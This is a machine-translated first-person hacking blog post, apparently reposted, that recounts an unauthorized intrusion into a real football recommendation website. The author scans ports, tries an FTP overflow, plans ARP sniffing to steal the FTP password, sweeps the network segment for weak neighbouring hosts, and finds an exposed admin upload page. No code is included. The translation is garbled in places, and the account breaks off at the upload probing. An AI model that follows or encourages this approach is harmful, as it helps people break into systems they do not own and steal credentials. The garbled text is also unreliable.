A true invasion ------ 对 渗 一 一 推 站 站 站
Source: http://www.17nc.com/ Due to some reason! We have to penetrate a football recommendation site - www. ******. COM is infiltrated, first of all, is of course stepped. Sweep with the scanner. Look at what service looks. Open 21, 80, 554. FTP is serv-u, IIS is 6.0, there are 554, hey, this service is what I forgot. I only know that I can overflow and try it. failure! ~! ~ 1 There is no way, come back to his site, and observe where he has a loophole everywhere. Or injection point. I have been looking for N long. I can't find it, he is too functional. Use the Guilin veterans to check his server to bind several domain names, or sites. Sixteen isolated. Now I want to do it. Find a relatively weak come in. Then hit our goal. Unfortunately, they are all the same football recommendation site. And all of the full-scale companies are designed for them, and their program security is not bad, basically can't find anything that can be used. I can only use the most despicable tricks. Arpsniff sniffs its FTP password. As for the principle, I will not say more here. If you want to know, you can go online to see related articles. The most successful example is the "danger of the external black mainframe" written by the small road. To sniff, you must enter the machine in their gateway, and it is best to open 3389, with superscan3.0 to fly their network segment 61.143. ***. 254, unfortunately. There is basically a firewall, hehe. I am afraid of firewall. But the magic is one foot, the road is high, huh, huh. Naturally there is a way to solve his method. Open a 21-port, 3389 port, and 80 port. I sweep, sweep it. Almost I am desperate, the host of the network segment doesn't have a few, and a lot is the Linux system, and it is helpless! ~! ~! ~ 1 Of course, the process of finding a vulnerability host is long. I have encountered a lot of failures, and I only said that I only said that IP with Guilin veterans to find IP 61.143. ***. 121 has 5 sites (our target IP is 6143. ***. 108) One trial, find SQL injection port, depressed, almost all static HTM files. Just when I desperate. After the URL, try http://www.xxx.com/admin to appear 403 errors, hehe. Explain that this folder is generally the place where the management site is logged in. With the experience, try there is upload, http://www.xxx.com/admin/uopload.asp 嘿嘿, hope, Microsoft VBScript run This property or method is not supported by error error '800A01B6' object: 'form' /admin/upload.asp, line 20 shows this file. But this cannot be the one he submitted. So, try Upload.htm, there is a cute upload page.
See if there is any upload loophole! ~ Check Open Source Code Discovering
